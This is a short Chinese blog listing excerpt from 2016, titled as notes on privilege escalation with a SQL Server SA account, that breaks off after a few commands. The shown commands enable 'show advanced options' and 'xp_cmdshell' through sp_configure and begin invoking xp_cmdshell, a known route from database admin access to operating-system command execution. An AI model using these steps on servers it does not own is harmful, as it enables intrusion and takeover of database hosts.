摘要: SA提权笔记: EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE; Exec master.dbo.xp_cm 阅读全文
posted @ 2016-11-12 19:04 Bypass 阅读(390) 评论(0) 推荐(0)